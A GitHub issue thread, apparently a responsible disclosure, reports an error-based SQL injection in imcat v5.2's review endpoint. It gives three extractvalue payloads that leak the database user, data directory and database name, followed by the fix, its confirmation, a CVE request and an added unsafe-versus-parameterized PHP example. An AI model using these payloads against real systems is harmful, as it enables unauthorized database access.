
SQL injection vulnerability in latest release v5.2 product reviews #5

Closed
Aquilao opened this issue Aug 2, 2020 · 4 comments

Aquilao commented Aug 2, 2020

Hi, I would like to report a SQL injection vulnerability in the latest release (v5.2) product reviews (/root/plus/coms/add_coms.php).

I found it in the demo (https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441).

Add a product review
[screenshot: imcat1]

Test the fm[auser] in the request body

payload:
'and/**/extractvalue('anything',concat('~',(select user())))and'
[screenshot: imcat2]

payload:
'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'
[screenshot: imcat3]

payload:
'and/**/extractvalue('anything',concat('~',(select database())))and'
[screenshot]
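As an added illustration (not imcat's own code, which this thread does not show), here is the pattern the owner describes below: a member points-accumulation query that splices the submitted fm[auser] value into SQL, next to the same query with a bound parameter. The table, column and function names are assumptions, and an in-memory SQLite database stands in for MySQL.

```php
<?php
// Added illustration, not imcat's code. Table/column names (fa_member, auser,
// points) and the function names are assumptions for this example.

// Unsafe form: the request value is spliced into the statement, so a quote in
// fm[auser] changes the query text and any database error leaks to the caller.
function addPointsUnsafe(PDO $db, array $fm, int $delta): int
{
    $sql = "UPDATE fa_member SET points = points + $delta "
         . "WHERE auser = '" . $fm['auser'] . "'";
    return $db->exec($sql);
}

// Hardened form: the value travels as a bound parameter and is never parsed
// as SQL, whatever characters it contains.
function addPointsSafe(PDO $db, array $fm, int $delta): int
{
    $stmt = $db->prepare(
        'UPDATE fa_member SET points = points + :delta WHERE auser = :auser'
    );
    $stmt->bindValue(':delta', $delta, PDO::PARAM_INT);
    $stmt->bindValue(':auser', (string)($fm['auser'] ?? ''), PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed demo database (SQLite in memory stands in for MySQL here).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE fa_member (auser TEXT PRIMARY KEY, points INTEGER NOT NULL)');
$db->exec("INSERT INTO fa_member VALUES ('alice', 0)");

// A legitimate value containing a quote: the safe form simply matches no row,
// while the unsafe form turns it into a syntax error, the kind of error message
// an error-based injection such as the one reported above feeds on.
$fm = ['auser' => "o'brien"];
echo "safe form updated rows: " . addPointsSafe($db, $fm, 5) . "\n";
try {
    addPointsUnsafe($db, $fm, 5);
} catch (PDOException $e) {
    echo "unsafe form raised: " . $e->getMessage() . "\n";
}
```

On MySQL the same fix applies; also disable PDO::ATTR_EMULATE_PREPARES so the server, not the driver, performs the binding.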

peacexie (Owner) commented Aug 3, 2020

Thanks!

I checked this error message. It worked OK for inserting the review;
it is a bug when dealing with accumulating points for the member.
By the way, were you logged in as a member?

I fixed this on the site: https://imcat.txjia.com/.
Can it stop you from attacking?

Hoping for your message; I'll update the master branch after you have checked it.

Aquilao (Author) commented Aug 3, 2020

Great. I just rechecked the SQL injection on the demo and it has been fixed.

By the way, I wasn't logged in when I found the vulnerability.

peacexie (Owner) commented Aug 3, 2020

OK, Thanks!

Aquilao (Author) commented Aug 12, 2020

Hi, can you help me request a CVE?
Requesting a CVE identification number - GitHub Docs
[screenshot]
Thanks.

@peacexie peacexie pinned this issue Aug 29, 2020
@peacexie peacexie unpinned this issue Aug 29, 2020